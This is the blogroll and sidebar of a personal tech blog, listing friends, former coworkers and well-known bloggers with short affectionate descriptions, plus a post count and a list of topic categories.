Scott Adams is the creator of Dilbert, and his blog is an incredibly smart, clever and often funny (sometimes very serious) look at the world. Everyone should read this blog.
| Alex Scoble
Alex is a former coworker who blogs about a variety of IT-related topics.
| Brent Strange
Brent is a cool dude and a great QA guy that I used to work with. His blog is, appropriately, focused on QA and testing technology.
| Chris Brooks
Chris was formerly my boss at work and is an avid board gamer and photographer. He always has some new info about top-notch board games you may have never heard of, so if you're into them, you should check out this blog.
| Chris Pirillo
Lockergnome by trade, Chris is always up to something new. If you are not familiar with the Lockergnome newsletters, be sure to check them out, too.
| Matthew Lapworth
Matt's a software developer and friend. He seems to enjoy extreme sports. That's fine as long as he doesn't, like, die or something.
| Milind Pandit
Milind writes about all sorts of interesting stuff. We worked toegther for eight years, and he worked at our employer longer than I, which pretty much makes him old as dirt in company time. :)
| MSFT Security Bulletins [RSS]
RSS feed for all Microsoft security bulletins provides an always-up-to-date list of updates along with complete descriptions of each.
Rory Blyth is one of the funniest and most thought-provoking bloggers I read. And I blame him for everything. Literally.
| Scott Hanselman
Scott's computerzen blog is a popular spot for all things .NET and innovative. I used to work with him, but then he went off to Microsoft. He's one of the smartest guys I know, and arguably the best technical presenter around.
Who Links Here
Total Posts: 1891
Android (7) Apple (67) AudioBlogging (42) Aviation (2) Blogging (154) Fireworks (5) Geek Out (130) GnomeDex (20) Google Voice (1) Helping Others (27) Home Servers (5) Humor (144) IT Security (218) Kineflex Artificial Disc Surgery (17) Management (8) Microsoft Office (4) Mobile (139) Movies (31) Mt. St. Helens (13) Office 2003 (52) OneNote (29) Personal Stories (164) Photography (29) Random Stuff (642) RSS Stuff (47) RunAs Radio (28) Safe Computing (39) SharePoint (56) Tablet PC (42) Tech (1037) Things that Suck (69) Windows (7) Windows Media Technology (27)
This Year: 0
This Month: 0
This Week: 0